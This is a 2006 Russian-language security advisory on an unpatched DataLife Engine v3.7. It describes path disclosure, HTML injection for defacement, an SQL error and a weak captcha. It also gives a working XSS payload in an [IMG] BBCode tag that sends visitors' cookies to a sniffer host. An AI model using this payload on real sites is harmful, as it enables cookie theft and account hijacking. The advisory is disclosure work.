------------------------------------------------
/\
\/ DataLife Engine v.3.7 SoftNews Media Group advisory
Программный продукт : DataLife Engine v.3.7 SoftNews Media Group
Текущее состояние : UNPATCHED
Найдена : LTK
Дата написания : 29nd March, 2006
Тестировалось : ;)
Детали :
[Раскрытие установочного пути]
В parse.class.php выделено 12582912 байт на проверку сообщения.
Переполнение делается так: "<<><><><><><>>"
[Управление генерированием страниц]
На некоторых системах удалось выполнять простые html теги :
<br></td><plaintext></td><hr><form><input>
Что может сказаться на внешнем виде сайта, ака deface по быстрому.
[ХСС]
Угнать кукисы можно при помощи вставки картинки.
[img][/img] – этим можно воспользваться всегда, даже если нету таких кнопок при
добавлении новости, личном сообщении, добавления коментария.
Непосредственно сама ХСС:
[IMG=left]http://anyimage.com/ok.gif" onmouseover='document.location="http://your.sniffer.com/sniff/sniff.gif?id="+document.cookie;'><!--[/IMG]
Если установлен форум, то куки приходят и от него.
[Проблемы с SQL]
http://target.net/category/topic/ – где topic – это не существующая тема.
Результат: SELECT id FROM nws_category WHERE parentid=not detected ;
Может, народные умельцы, в скором времени, что и придумают. :р
[antibot]
antibot.php не справляеться со своей задачей, при одновременном коннетке
он выдаёт одинаковые картинки.
[Greets ]
OrkzRule
/\ [email protected] ICQ: 200-255-251
\/
------------------------------------------------